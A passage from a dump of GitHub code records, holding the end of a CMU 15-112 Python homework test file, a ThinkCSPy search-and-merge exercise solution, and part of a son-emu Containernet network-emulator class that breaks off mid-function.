4) == 189252201)\n assert(colorBlender(220020060, 189252201, 3, 5) == None)\n # http://meyerweb.com/eric/tools/color-blend/#0100FF:FF0280:2:rgbd\n assert(colorBlender(1000255, 255002128, 2, -1) == None)\n assert(colorBlender(1000255, 255002128, 2, 0) == 1000255)\n assert(colorBlender(1000255, 255002128, 2, 1) == 86001213)\n assert(colorBlender(1000255, 255002128, 2, 2) == 170001170)\n assert(colorBlender(1000255, 255002128, 2, 3) == 255002128)\n print('Passed.')\n\ndef getCubicCoeffs(k, root1, root2, root3):\n # Given roots e,f,g and vertical scale k, we can find\n # the coefficients a,b,c,d as such:\n # k(x-e)(x-f)(x-g) =\n # k(x-e)(x^2 - (f+g)x + fg)\n # kx^3 - k(e+f+g)x^2 + k(ef+fg+eg)x - kefg\n e,f,g = root1, root2, root3\n return k, -k*(e+f+g), k*(e*f+f*g+e*g), -k*e*f*g\n\ndef testFindIntRootsOfCubicCase(k, z1, z2, z3):\n a,b,c,d = getCubicCoeffs(k, z1, z2, z3)\n result1, result2, result3 = bonusFindIntRootsOfCubic(a,b,c,d)\n m1 = min(z1, z2, z3)\n m3 = max(z1, z2, z3)\n m2 = (z1+z2+z3)-(m1+m3)\n actual = (m1, m2, m3)\n assert(almostEqual(m1, result1))\n assert(almostEqual(m2, result2))\n assert(almostEqual(m3, result3))\n\ndef testBonusFindIntRootsOfCubic():\n print('Testing findIntRootsOfCubic()...', end='')\n testFindIntRootsOfCubicCase(5, 1, 3, 2)\n testFindIntRootsOfCubicCase(2, 5, 33, 7)\n testFindIntRootsOfCubicCase(-18, 24, 3, -8)\n testFindIntRootsOfCubicCase(1, 2, 3, 4)\n print('Passed.')\n\n#################################################\n# Hw1 Main\n#################################################\n\ndef testAll():\n testFabricYards()\n testFabricExcess()\n testIsRightTriangle()\n testColorBlender()\n testBonusFindIntRootsOfCubic()\n\ndef main():\n bannedTokens = (\n #'False,None,True,and,assert,def,elif,else,' +\n #'from,if,import,not,or,return,' +\n 'as,break,class,continue,del,except,finally,for,' +\n 'global,in,is,lambda,nonlocal,pass,raise,repr,' +\n 'try,while,with,yield,' +\n #'abs,all,any,bool,chr,complex,divmod,float,' +\n #'int,isinstance,max,min,pow,print,round,sum,' +\n '__import__,ascii,bin,bytearray,bytes,callable,' +\n 'classmethod,compile,delattr,dict,dir,enumerate,' +\n 'eval,exec,filter,format,frozenset,getattr,globals,' +\n 'hasattr,hash,help,hex,id,input,issubclass,iter,' +\n 'len,list,locals,map,memoryview,next,object,oct,' +\n 'open,ord,property,range,repr,reversed,set,' +\n 'setattr,slice,sorted,staticmethod,str,super,tuple,' +\n 'type,vars,zip,importlib,imp,string,[,],{,}')\n cs112_s17_linter.lint(bannedTokens=bannedTokens) # check style rules\n testAll()\n\nif __name__ == '__main__':\n main()\n","repo_name":"theguyoverthere/CMU15-112-Spring17","sub_path":"src/Week1/Homework/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":9306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18364521333","text":"\"\"\"\nMission: To return a list of words from a text that are not in our vocab\n\nRequirements:\nmust search through a text to find an item\nmust return a list of unknown words in a list\nmust read a file and return its content in a list\n\"\"\"\nfrom unit_tester import test\nimport time\n\n\ndef linear_search(array, target):\n \"\"\"Searchs for an item in a list in a linear fashion\"\"\"\n for i, item in enumerate(array):\n if item == target:\n return i\n return -1\n\n\ndef binary_search(array, target):\n \"\"\"implementation of binary search to find a target item\"\"\"\n low = 0\n high = len(array)\n\n while True:\n\n if low == high:\n return -1\n\n mid_index = (high + low) // 2\n mid_item = array[mid_index]\n\n if mid_item == target:\n return mid_index\n\n elif mid_item < target:\n low = mid_index + 1\n\n else:\n high = mid_index\n\n\ndef get_words_in_file(filename):\n \"\"\"get the words from a file and returns a list of the words free of punctuation\"\"\"\n f = open(filename)\n content = f.read()\n f.close()\n words = clean_text(content)\n return words\n\n\ndef clean_text(content):\n \"\"\"takes a string and returns the punctuation-free lowercase string version in a list\"\"\"\n my_substitutions = content.maketrans(\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&()*+,-./:;<=>?@[]^_`{|}~'\\\\\",\n \"abcdefghijklmnopqrstuvwxyz \",\n )\n\n cleaned_text = content.translate(my_substitutions)\n wds = cleaned_text.split()\n return wds\n\n\ndef remove_adjacent_dups(array):\n \"\"\" removes adjacent duplicates from a list\"\"\"\n no_duplicates = []\n most_recent = None\n for item in array:\n if item != most_recent:\n no_duplicates.append(item)\n most_recent = item\n\n return no_duplicates\n\n\ndef merge(array1, array2):\n \"\"\" merges two sorted list into a single sorted list\"\"\"\n array1_pointer = 0\n array2_pointer = 0\n merged = []\n\n while True:\n if array1_pointer >= len(array1):\n merged.extend(array2[array2_pointer:])\n print(merged)\n\n return merged\n if array2_pointer >= len(array2):\n merged.extend(array1[array1_pointer:])\n print(merged)\n\n return merged\n\n if array1[array1_pointer] <= array2[array2_pointer]:\n merged.append(array1[array1_pointer])\n array1_pointer += 1\n\n else:\n array1[array1_pointer] > array2[array2_pointer]\n merged.append(array2[array2_pointer])\n array2_pointer += 1\n\n\ndef find_unknown_merge_pattern(vocab, wds):\n \"\"\"Both the vocab and the words must be sorted. Returns a new list of words from wds that do not occur in vocab\"\"\"\n xi = 0\n yi = 0\n result = []\n while True:\n if xi >= len(vocab):\n result.extend(wds[yi:])\n return result\n\n if yi >= len(wds):\n return result\n\n if vocab[xi] == wds[yi]:\n yi += 1\n elif vocab[xi] < wds[yi]:\n xi += 1\n else:\n result.append(wds[yi])\n yi += 1\n\n\ndef unknown_words(vocab, text):\n \"\"\"collects all the words that appear in text that are not in the vocab\"\"\"\n unknown = []\n for word in text:\n if binary_search(vocab, word) < 0:\n unknown.append(word)\n return unknown\n\n\ndef test_suite():\n friends = \"Joe Zoe Brad Angelina Zuki Thandi Paris\".split()\n print(\"\\n Linear Search\")\n test(linear_search(friends, \"Zoe\") == 1)\n test(linear_search(friends, \"Joe\") == 0)\n test(linear_search(friends, \"Paris\") == 6)\n test(linear_search(friends, \"Bill\") == -1)\n\n print(\"\\n Unknown Words\")\n vocab = \"apple boy dog down fell girl grass the tree\".split()\n book_words = \"the apple fell from the tree to the grass\".split()\n test(unknown_words(vocab, book_words) == [\"from\", \"to\"])\n test(unknown_words([], book_words) == book_words)\n test(unknown_words(vocab, [\"the\", \"boy\", \"fell\"]) == [])\n\n print(\"\\n clean_text\")\n test(clean_text(\"My name is Earl!\") == \"my name is earl\".split())\n test(clean_text(\"Well, I never!, said Alice.\") == \"well i never said alice\".split())\n\n print(\"\\n Binary Search\")\n xs = [2, 3, 5, 7, 11, 13, 17, 23, 29, 31, 37, 43, 47, 53]\n test(binary_search(xs, 20) == -1)\n test(binary_search(xs, 99) == -1)\n test(binary_search(xs, 1) == -1)\n for (i, v) in enumerate(xs):\n test(binary_search(xs, v) == i)\n\n print(\"\\n Remove Duplicates\")\n test(remove_adjacent_dups([1, 2, 3, 3, 3, 3, 5, 6, 9, 9]) == [1, 2, 3, 5, 6, 9])\n test(remove_adjacent_dups([]) == [])\n test(\n remove_adjacent_dups([\"a\", \"big\", \"big\", \"bite\", \"dog\"])\n == [\"a\", \"big\", \"bite\", \"dog\"]\n )\n\n print(\"\\n Merge Sorted\")\n xs = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]\n ys = [4, 8, 12, 16, 20, 24]\n zs = xs + ys\n zs.sort()\n test(merge(xs, []) == [])\n test(merge(xs, ys) == zs)\n test(merge([1, 2, 3], [3, 4, 5]) == [1, 2, 3, 3, 4, 5])\n test(\n merge([\"a\", \"big\", \"cat\"], [\"big\", \"bite\", \"dog\"])\n == [\"a\", \"big\", \"big\", \"bite\", \"cat\", \"dog\"]\n )\n\n\nbigger_vocab = get_words_in_file(\"vocab.txt\")\nall_words = get_words_in_file(\"alice_in_wonderland.txt\")\n\n\nt0 = time.process_time()\nall_words.sort()\nbook_words = remove_adjacent_dups(all_words)\nmissing_words = find_unknown_merge_pattern(bigger_vocab, book_words)\nt1 = time.process_time()\n\nprint(\"There are {0} unknown words.\".format(len(missing_words)))\nprint(\"that took {0:.4f} seconds.\".format(t1 - t0))\n","repo_name":"Tyrhen/Thinkcspy_Solutions","sub_path":"Chapter14/Chapter14_AW.py","file_name":"Chapter14_AW.py","file_ext":"py","file_size_in_byte":5589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"10771342729","text":"import logging\nimport time\nimport re\nimport requests\nimport os\nimport json\nimport networkx as nx\nfrom subprocess import Popen\n# from gevent import monkey\nfrom mininet.net import Containernet\nfrom mininet.node import OVSSwitch, OVSKernelSwitch, Docker, RemoteController\nfrom mininet.cli import CLI\nfrom mininet.link import TCLink\nfrom mininet.clean import cleanup\nfrom emuvim.dcemulator.monitoring import DCNetworkMonitor\nfrom emuvim.dcemulator.node import Datacenter, EmulatorCompute\nfrom emuvim.dcemulator.resourcemodel import ResourceModelRegistrar\n\n# ensure correct functionality of all gevent based REST servers\n# monkey.patch_all()\n\n# setup logging\nLOG = logging.getLogger(\"dcemulator.net\")\nLOG.setLevel(logging.DEBUG)\n\n# default CPU period used for cpu percentage-based cfs values (microseconds)\nCPU_PERIOD = 1000000\n\n# default priority setting for added flow-rules\nDEFAULT_PRIORITY = 1000\n# default cookie number for new flow-rules\nDEFAULT_COOKIE = 10\n\n\nclass DCNetwork(Containernet):\n \"\"\"\n Wraps the original Mininet/Containernet class and provides\n methods to add data centers, switches, etc.\n\n This class is used by topology definition scripts.\n \"\"\"\n\n def __init__(self, controller=RemoteController, monitor=False,\n enable_learning=False,\n # learning switch behavior of the default ovs switches icw Ryu\n # controller can be turned off/on, needed for E-LAN\n # functionality\n dc_emulation_max_cpu=1.0, # fraction of overall CPU time for emulation\n dc_emulation_max_mem=512, # emulation max mem in MB\n **kwargs):\n \"\"\"\n Create an extended version of a Containernet network\n :param dc_emulation_max_cpu: max. CPU time used by containers in data centers\n :param kwargs: path through for Mininet parameters\n :return:\n \"\"\"\n # members\n self.dcs = {}\n self.ryu_process = None\n # list of deployed nsds.E_Lines and E_LANs (uploaded from the dummy\n # gatekeeper)\n self.deployed_nsds = []\n self.deployed_elines = []\n self.deployed_elans = []\n self.installed_chains = []\n\n # always cleanup environment before we start the emulator\n self.killRyu()\n cleanup()\n\n # call original Docker.__init__ and setup default controller\n Containernet.__init__(\n self, switch=OVSKernelSwitch, controller=controller, **kwargs)\n\n # default switch configuration\n enable_ryu_learning = False\n if enable_learning:\n self.failMode = 'standalone'\n enable_ryu_learning = True\n else:\n self.failMode = 'secure'\n\n # Ryu management\n if controller == RemoteController:\n # start Ryu controller\n self.startRyu(learning_switch=enable_ryu_learning)\n\n # add the specified controller\n self.addController('c0', controller=controller)\n\n # graph of the complete DC network\n self.DCNetwork_graph = nx.MultiDiGraph()\n\n # initialize pool of vlan tags to setup the SDN paths\n self.vlans = list(range(1, 4095))[::-1]\n\n # link to Ryu REST_API\n ryu_ip = 'localhost'\n ryu_port = '8080'\n self.ryu_REST_api = 'http://{0}:{1}'.format(ryu_ip, ryu_port)\n self.RyuSession = requests.Session()\n\n # monitoring agent\n if monitor:\n self.monitor_agent = DCNetworkMonitor(self)\n else:\n self.monitor_agent = None\n\n # initialize resource model registrar\n self.rm_registrar = ResourceModelRegistrar(\n dc_emulation_max_cpu, dc_emulation_max_mem)\n self.cpu_period = CPU_PERIOD\n\n def addDatacenter(self, label, metadata={}, resource_log_path=None):\n \"\"\"\n Create and add a logical cloud data center to the network.\n \"\"\"\n if label in self.dcs:\n raise Exception(\"Data center label already exists: %s\" % label)\n dc = Datacenter(label, metadata=metadata,\n resource_log_path=resource_log_path)\n dc.net = self # set reference to network\n self.dcs[label] = dc\n dc.create() # finally create the data center in our Mininet instance\n LOG.info(\"added data center: %s\" % label)\n return dc\n\n def addLink(self, node1, node2, **params):\n \"\"\"\n Able to handle Datacenter objects as link\n end points.\n \"\"\"\n assert node1 is not None\n assert node2 is not None\n\n # ensure type of node1\n if isinstance(node1, str):\n if node1 in self.dcs:\n node1 = self.dcs[node1].switch\n if isinstance(node1, Datacenter):\n node1 = node1.switch\n # ensure type of node2\n if isinstance(node2, str):\n if node2 in self.dcs:\n node2 = self.dcs[node2].switch\n if isinstance(node2, Datacenter):\n node2 = node2.switch\n # try to give containers a default IP\n if isinstance(node1, Docker):\n if \"params1\" not in params:\n params[\"params1\"] = {}\n if \"ip\" not in params[\"params1\"]:\n params[\"params1\"][\"ip\"] = self.getNextIp()\n if isinstance(node2, Docker):\n if \"params2\" not in params:\n params[\"params2\"] = {}\n if \"ip\" not in params[\"params2\"]:\n params[\"params2\"][\"ip\"] = self.getNextIp()\n # ensure that we allow TCLinks between data centers\n # TODO this is not optimal, we use cls=Link for containers and TCLink for data centers\n # see Containernet issue:\n # https://github.com/mpeuster/containernet/issues/3\n if \"cls\" not in params:\n params[\"cls\"] = TCLink\n\n link = Containernet.addLink(self, node1, node2, **params)\n\n # try to give container interfaces a default id\n node1_port_id = node1.ports[link.intf1]\n if isinstance(node1, Docker):\n if \"id\" in params[\"params1\"]:\n node1_port_id = params[\"params1\"][\"id\"]\n node1_port_name = link.intf1.name\n\n node2_port_id = node2.ports[link.intf2]\n if isinstance(node2, Docker):\n if \"id\" in params[\"params2\"]:\n node2_port_id = params[\"params2\"][\"id\"]\n node2_port_name = link.intf2.name\n\n # add edge and assigned port number to graph in both directions between node1 and node2\n # port_id: id given in descriptor (if available, otherwise same as port)\n # port: portnumber assigned by Containernet\n\n attr_dict = {}\n # possible weight metrics allowed by TClink class:\n weight_metrics = ['bw', 'delay', 'jitter', 'loss']\n edge_attributes = [p for p in params if p in weight_metrics]\n for attr in edge_attributes:\n # if delay: strip ms (need number as weight in graph)\n match = re.search('([0-9]*\\.?[0-9]+)', str(params[attr]))\n if match:\n attr_number = match.group(1)\n else:\n attr_number = None\n attr_dict[attr] = attr_number\n\n attr_dict2 = {'src_port_id': node1_port_id, 'src_port_nr': node1.ports[link.intf1],\n 'src_port_name': node1_port_name,\n 'dst_port_id': node2_port_id, 'dst_port_nr': node2.ports[link.intf2],\n 'dst_port_name': node2_port_name}\n attr_dict2.update(attr_dict)\n self.DCNetwork_graph.add_edge(\n node1.name, node2.name, **attr_dict2)\n\n attr_dict2 = {'src_port_id': node2_port_id, 'src_port_nr': node2.ports[link.intf2],\n 'src_port_name': node2_port_name,\n 'dst_port_id': node1_port_id, 'dst_port_nr': node1.ports[link.intf1],\n 'dst_port_name': node1_port_name}\n attr_dict2.update(attr_dict)\n self.DCNetwork_graph.add_edge(\n node2.name, node1.name, **attr_dict2)\n\n LOG.debug(\"addLink: n1={0} intf1={1} -- n2={2} intf2={3}\".format(\n str(node1), node1_port_name, str(node2), node2_port_name))\n\n return link\n\n def removeLink(self, link=None, node1=None, node2=None):\n \"\"\"\n Remove the link from the Containernet and the networkx graph\n \"\"\"\n if link is not None:\n node1 = link.intf1.node\n node2 = link.intf2.node\n assert node1 is not None\n assert node2 is not None\n Containernet.removeLink(self, link=link, node1=node1, node2=node2)\n # TODO we might decrease the loglevel to debug:\n try:\n self.DCNetwork_graph.remove_edge(node2.name, node1.name)\n except BaseException:\n LOG.warning(\"%s, %s not found in DCNetwork_graph.\" %\n ((node2.name, node1.name)))\n try:\n self.DCNetwork_graph.remove_edge(node1.name, node2.name)\n except BaseException:\n LOG.warning(\"%s, %s not found in DCNetwork_graph.\" %\n ((node1.name, node2.name)))\n\n def addDocker(self, label, **params):\n \"\"\"\n Wrapper for addDocker method to use custom container class.\n \"\"\"\n self.DCNetwork_graph.add_node(label, type=params.get('type', 'docker'))\n return Containernet.addDocker(\n self, label, cls=EmulatorCompute, **params)\n\n def removeDocker(self, label, **params):\n \"\"\"\n Wrapper for removeDocker method to update graph.\n \"\"\"\n self.DCNetwork_graph.remove_node(label)\n return Containernet.removeDocker(self, label, **params)\n\n def addExtSAP(self, sap_name, sap_ip, **params):\n \"\"\"\n Wrapper for addExtSAP method to store SAP also in graph.\n \"\"\"\n # make sure that 'type' is set\n params['type'] = params.get('type', 'sap_ext')\n self.DCNetwork_graph.add_node(sap_name, type=params['type'])\n return Containernet.addExtSAP(self, sap_name, sap_ip, **params)\n\n def removeExtSAP(self, sap_name, **params):\n \"\"\"\n Wrapper for removeExtSAP method to remove SAP also from graph.\n \"\"\"\n self.DCNetwork_graph.remove_node(sap_name)\n return Containernet.removeExtSAP(self, sap_name)\n\n def addSwitch(self, name, add_to_graph=True, **params):\n \"\"\"\n Wrapper for addSwitch method to store switch also in graph.\n \"\"\"\n\n # add this switch to the global topology overview\n if add_to_graph:\n self.DCNetwork_graph.add_node(\n name, type=params.get('type', 'switch'))\n\n # set the learning switch behavior\n if 'failMode' in params:\n failMode = params['failMode']\n else:\n failMode = self.failMode\n\n s = Containernet.addSwitch(\n self, name, protocols='OpenFlow10,OpenFlow12,OpenFlow13', failMode=failMode, **params)\n\n return s\n\n def getAllContainers(self):\n \"\"\"\n Returns a list with all containers within all data centers.\n \"\"\"\n all_containers = []\n for dc in self.dcs.values():\n all_containers += dc.listCompute()\n return all_containers\n\n def start(self):\n # start\n for dc in self.dcs.values():\n dc.start()\n Containernet.start(self)\n\n def stop(self):\n\n # stop the monitor agent\n if self.monitor_agent is not None:\n self.monitor_agent.stop()\n\n # stop emulator net\n Containernet.stop(self)\n\n # stop Ryu controller\n self.killRyu()\n\n def CLI(self):\n CLI(self)\n\n def setLAN(self, vnf_list):\n \"\"\"\n setup an E-LAN network by assigning the same VLAN tag to each DC interface of the VNFs in the E-LAN\n\n :param vnf_list: names of the VNFs in this E-LAN [{name:,interface:},...]\n :return:\n \"\"\"\n src_sw = None\n src_sw_inport_name = None\n\n # get a vlan tag for this E-LAN\n vlan = self.vlans.pop()\n\n for vnf in vnf_list:\n vnf_src_name = vnf['name']\n vnf_src_interface = vnf['interface']\n\n # check if port is specified (vnf:port)\n if vnf_src_interface is None:\n # take first interface by default\n connected_sw = self.DCNetwork_graph.neighbors(vnf_src_name)[0]\n link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n vnf_src_interface = link_dict[0]['src_port_id']\n\n for connected_sw in self.DCNetwork_graph.neighbors(vnf_src_name):\n link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n for link in link_dict:\n if (link_dict[link]['src_port_id'] == vnf_src_interface or\n link_dict[link]['src_port_name'] == vnf_src_interface): # Fix: we might also get interface names, e.g, from a son-emu-cli call\n # found the right link and connected switch\n src_sw = connected_sw\n src_sw_inport_name = link_dict[link]['dst_port_name']\n break\n\n # set the tag on the dc switch interface\n LOG.debug('set E-LAN: vnf name: {0} interface: {1} tag: {2}'.format(\n vnf_src_name, vnf_src_interface, vlan))\n switch_node = self.getNodeByName(src_sw)\n self._set_vlan_tag(switch_node, src_sw_inport_name, vlan)\n\n def getNodeByName(self, name):\n \"\"\"\n Wraps Containernet's getNodeByName method to avoid\n key not found exceptions.\n \"\"\"\n try:\n return super(DCNetwork, self).getNodeByName(name)\n except BaseException as ex:\n LOG.warning(\"Node not found: {}\".format(name))\n LOG.debug(\"Node not found: {}\".format(ex))\n return None\n\n def _addMonitorFlow(self, vnf_src_name, vnf_dst_name, vnf_src_interface=None, vnf_dst_interface=None,\n tag=None, **kwargs):\n \"\"\"\n Add a monitoring flow entry that adds a special flowentry/counter at the begin or end of a chain.\n So this monitoring flowrule exists on top of a previously defined chain rule and uses the same vlan tag/routing.\n :param vnf_src_name:\n :param vnf_dst_name:\n :param vnf_src_interface:\n :param vnf_dst_interface:\n :param tag: vlan tag to be used for this chain (same tag as existing chain)\n :param monitor_placement: 'tx' or 'rx' indicating to place the extra flowentry resp. at the beginning or end of the chain\n :return:\n \"\"\"\n\n src_sw = None\n src_sw_inport_nr = 0\n src_sw_inport_name = None\n dst_sw = None\n dst_sw_outport_nr = 0\n dst_sw_outport_name = None\n\n LOG.debug(\"call AddMonitorFlow vnf_src_name=%r, vnf_src_interface=%r, vnf_dst_name=%r, vnf_dst_interface=%r\",\n vnf_src_name, vnf_src_interface, vnf_dst_name, vnf_dst_interface)\n\n # check if port is specified (vnf:port)\n if vnf_src_interface is None:\n # take first interface by default\n connected_sw = self.DCNetwork_graph.neighbors(vnf_src_name)[0]\n link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n vnf_src_interface = link_dict[0]['src_port_id']\n\n for connected_sw in self.DCNetwork_graph.neighbors(vnf_src_name):\n link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n for link in link_dict:\n if (link_dict[link]['src_port_id'] == vnf_src_interface or\n link_dict[link]['src_port_name'] == vnf_src_interface): # Fix: we might also get interface names, e.g, from a son-emu-cli call\n # found the right link and connected switch\n src_sw = connected_sw\n src_sw_inport_nr = link_dict[link]['dst_port_nr']\n src_sw_inport_name = link_dict[link]['dst_port_name']\n break\n\n if vnf_dst_interface is None:\n # take first interface by default\n connected_sw = self.DCNetwork_graph.neighbors(vnf_dst_name)[0]\n link_dict = self.DCNetwork_graph[connected_sw][vnf_dst_name]\n vnf_dst_interface = link_dict[0]['dst_port_id']\n\n vnf_dst_name = vnf_dst_name.split(':')[0]\n for connected_sw in self.DCNetwork_graph.neighbors(vnf_dst_name):\n link_dict = self.DCNetwork_graph[connected_sw][vnf_dst_name]\n for link in link_dict:\n if link_dict[link]['dst_port_id'] == vnf_dst_interface or \\\n link_dict[link]['dst_port_name'] == vnf_dst_interface: # Fix: we might also get interface names, e.g, from a son-emu-cli call\n # found the right link and connected switch\n dst_sw = connected_sw\n dst_sw_outport_nr = link_dict[link]['src_port_nr']\n dst_sw_outport_name = link_dict[link]['src_port_name']\n break\n\n if not tag >= 0:\n LOG.exception('tag not valid: {0}'.format(tag))\n\n # get shortest path\n try:\n # returns the first found shortest path\n # if all shortest paths are wanted, use: all_shortest_paths\n path = nx.shortest_path(\n self.DCNetwork_graph, src_sw, dst_sw, weight=kwargs.get('weight'))\n except BaseException:\n LOG.exception(\"No path could be found between {0} and {1} using src_sw={2} and dst_sw={3}\".format(\n vnf_src_name, vnf_dst_name, src_sw, dst_sw))\n LOG.debug(\"Graph nodes: %r\" % self.DCNetwork_graph.nodes())\n LOG.debug(\"Graph edges: %r\" % self.DCNetwork_graph.edges())\n for e, v in self.DCNetwork_graph.edges():\n LOG.debug(\"%r\" % self.DCNetwork_graph[e][v])\n return \"No path could be found between {0} and {1}\".format(\n vnf_src_name, vnf_dst_name)\n\n LOG.debug(\"Creating path between {0} and {1}: {2}\".format(\n vnf_src_name, vnf_dst_name, path))\n\n current_hop = src_sw\n switch_inport_nr = src_sw_inport_nr\n\n cmd = kwargs.get('cmd')\n\n # iterate through the path to install the flow-entries\n for i in range(0, len(path)):\n current_node = self.getNodeByName(current_hop)\n\n if path.index(current_hop) < len(path) - 1:\n next_hop = path[path.index(current_hop) + 1]\n else:\n # last switch reached\n next_hop = vnf_dst_name\n\n next_node = self.getNodeByName(next_hop)\n\n if next_hop == vnf_dst_name:\n switch_outport_nr = dst_sw_outport_nr\n LOG.debug(\"end node reached: {0}\".format(vnf_dst_name))\n elif not isinstance(next_node, OVSSwitch):\n LOG.info(\"Next node: {0} is not a switch\".format(next_hop))\n return \"Next node: {0} is not a switch\".format(next_hop)\n else:\n # take first link between switches by default\n index_edge_out = 0\n switch_outport_nr = self.DCNetwork_graph[current_hop][next_hop][index_edge_out]['src_port_nr']\n\n # set of entry via ovs-ofctl\n if isinstance(current_node, OVSSwitch):\n kwargs['vlan'] = tag\n kwargs['path'] = path\n kwargs['current_hop'] = current_hop\n kwargs['switch_inport_name'] = src_sw_inport_name\n kwargs['switch_outport_name'] = dst_sw_outport_name\n kwargs['skip_vlan_tag'] = True\n kwargs['pathindex'] = i\n\n monitor_placement = kwargs.get('monitor_placement').strip()\n # put monitor flow at the dst switch\n insert_flow = False\n # first node:\n if monitor_placement == 'tx' and path.index(current_hop) == 0:\n insert_flow = True\n # put monitoring flow at the src switch\n # last node:\n elif monitor_placement == 'rx' and path.index(current_hop) == len(path) - 1:\n insert_flow = True\n elif monitor_placement not in ['rx', 'tx']:\n LOG.exception(\n 'invalid monitor command: {0}'.format(monitor_placement))\n\n if self.controller == RemoteController and insert_flow:\n # set flow entry via ryu rest api\n self._set_flow_entry_ryu_rest(\n current_node, switch_inport_nr, switch_outport_nr, **kwargs)\n break\n elif insert_flow:\n # set flow entry via ovs-ofctl\n self._set_flow_entry_dpctl(\n current_node, switch_inport_nr, switch_outport_nr, **kwargs)\n break\n\n # take first link between switches by default\n if isinstance(next_node, OVSSwitch):\n switch_inport_nr = self.DCNetwork_graph[current_hop][next_hop][0]['dst_port_nr']\n current_hop = next_hop\n\n return \"path {2} between {0} and {1}\".format(\n vnf_src_name, vnf_dst_name, cmd)\n\n def setChain(self, vnf_src_name, vnf_dst_name,\n vnf_src_interface=None, vnf_dst_interface=None, **kwargs):\n \"\"\"\n Chain 2 vnf interfaces together by installing the flowrules in the switches along their path.\n Currently the path is found using the default networkx shortest path function.\n Each chain gets a unique vlan id , so different chains wil not interfere.\n\n :param vnf_src_name: vnf name (string)\n :param vnf_dst_name: vnf name (string)\n :param vnf_src_interface: source interface name (string)\n :param vnf_dst_interface: destination interface name (string)\n :param cmd: 'add-flow' (default) to add a chain, 'del-flows' to remove a chain\n :param cookie: cookie for the installed flowrules (can be used later as identifier for a set of installed chains)\n :param match: custom match entry to be added to the flowrules (default: only in_port and vlan tag)\n :param priority: custom flowrule priority\n :param monitor: boolean to indicate whether this chain is a monitoring chain\n :param tag: vlan tag to be used for this chain (pre-defined or new one if none is specified)\n :param skip_vlan_tag: boolean to indicate if a vlan tag should be appointed to this flow or not\n :param path: custom path between the two VNFs (list of switches)\n :return: output log string\n \"\"\"\n\n # special procedure for monitoring flows\n if kwargs.get('monitor'):\n\n # check if chain already exists\n found_chains = [chain_dict for chain_dict in self.installed_chains if\n (chain_dict['vnf_src_name'] == vnf_src_name and\n chain_dict['vnf_src_interface'] == vnf_src_interface and\n chain_dict['vnf_dst_name'] == vnf_dst_name and\n chain_dict['vnf_dst_interface'] == vnf_dst_interface)]\n\n if len(found_chains) > 0:\n # this chain exists, so need an extra monitoring flow\n # assume only 1 chain per vnf/interface pair\n LOG.debug('*** installing monitoring chain on top of pre-defined chain from {0}:{1} -> {2}:{3}'.\n format(vnf_src_name, vnf_src_interface, vnf_dst_name, vnf_dst_interface))\n tag = found_chains[0]['tag']\n ret = self._addMonitorFlow(vnf_src_name, vnf_dst_name, vnf_src_interface, vnf_dst_interface,\n tag=tag, table_id=0, **kwargs)\n return ret\n else:\n # no chain existing (or E-LAN) -> install normal chain\n LOG.warning('*** installing monitoring chain without pre-defined NSD chain from {0}:{1} -> {2}:{3}'.\n format(vnf_src_name, vnf_src_interface, vnf_dst_name, vnf_dst_interface))\n pass\n\n cmd = kwargs.get('cmd', 'add-flow')\n if cmd == 'add-flow' or cmd == 'del-flows':\n ret = self._chainAddFlow(\n vnf_src_name, vnf_dst_name, vnf_src_interface, vnf_dst_interface, **kwargs)\n if kwargs.get('bidirectional'):\n if kwargs.get('path') is not None:\n kwargs['path'] = list(reversed(kwargs.get('path')))\n ret = ret + '\\n' + \\\n self._chainAddFlow(\n vnf_dst_name, vnf_src_name, vnf_dst_interface, vnf_src_interface, **kwargs)\n\n else:\n ret = \"Command unknown\"\n\n return ret\n\n def _chainAddFlow(self, vnf_src_name, vnf_dst_name,\n vnf_src_interface=None, vnf_dst_interface=None, **kwargs):\n\n src_sw = None\n src_sw_inport_nr = 0\n src_sw_inport_name = None\n dst_sw = None\n dst_sw_outport_nr = 0\n dst_sw_outport_name = None\n\n LOG.debug(\"call chainAddFlow vnf_src_name=%r, vnf_src_interface=%r, vnf_dst_name=%r, vnf_dst_interface=%r\",\n vnf_src_name, vnf_src_interface, vnf_dst_name, vnf_dst_interface)\n\n # check if port is specified (vnf:port)\n if vnf_src_interface is None:\n # take first interface by default\n connected_sw = list(self.DCNetwork_graph.neighbors(vnf_src_name))[0]\n link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n vnf_src_interface = link_dict[0]['src_port_id']\n\n for connected_sw in self.DCNetwork_graph.neighbors(vnf_src_name):\n link_dict = self.DCNetwork_graph[vnf_src_name][connected_sw]\n for link in link_dict:\n if (link_dict[link]['src_port_id'] == vnf_src_interface or\n link_dict[link]['src_port_name'] == vnf_src_interface): # Fix: we might also get interface names, e.g, from a son-emu-cli call\n # found the right link and connected switch\n src_sw = connected_sw\n src_sw_inport_nr = link_dict[link]['dst_port_nr']\n src_sw_inport_name = link_dict[link]['dst_port_name']\n break\n\n if vnf_dst_interface is None:\n # take first interface by default\n connected_sw = list(self.DCNetwork_graph.neighbors(vnf_dst_name))[0]\n link_dict = self.DCNetwork_graph[connected_sw][vnf_dst_name]\n vnf_dst_interface = link_dict[0]['dst_port_id']\n\n vnf_dst_name = vnf_dst_name.split(':')[0]\n for connected_sw in self.DCNetwork_graph.neighbors(vnf_dst_name):\n link_dict = self.DCNetwork_graph[connected_sw][vnf_dst_name]\n for link in link_dict:\n if link_dict[link]['dst_port_id'] == vnf_dst_interface or \\\n link_dict[link]['dst_port_name'] == vnf_dst_interface: # Fix: we might also get interface names, e.g, from a son-emu-cli call\n # found the right link and connected switch\n dst_sw = connected_sw\n dst_sw_outport_nr = link_dict[link]['src_port_nr']\n dst_sw_outport_name = link_dict[link]['src_port_name']\n break\n\n path = kwargs.get('path')\n if path is None:\n # get shortest path\n try:\n # returns the first found shortest path\n # if all shortest paths are wanted, use: all_shortest_paths\n path = nx.shortest_path(\n self.DCNetwork_graph, src_sw, dst_sw, weight=kwargs.get('weight'))\n except 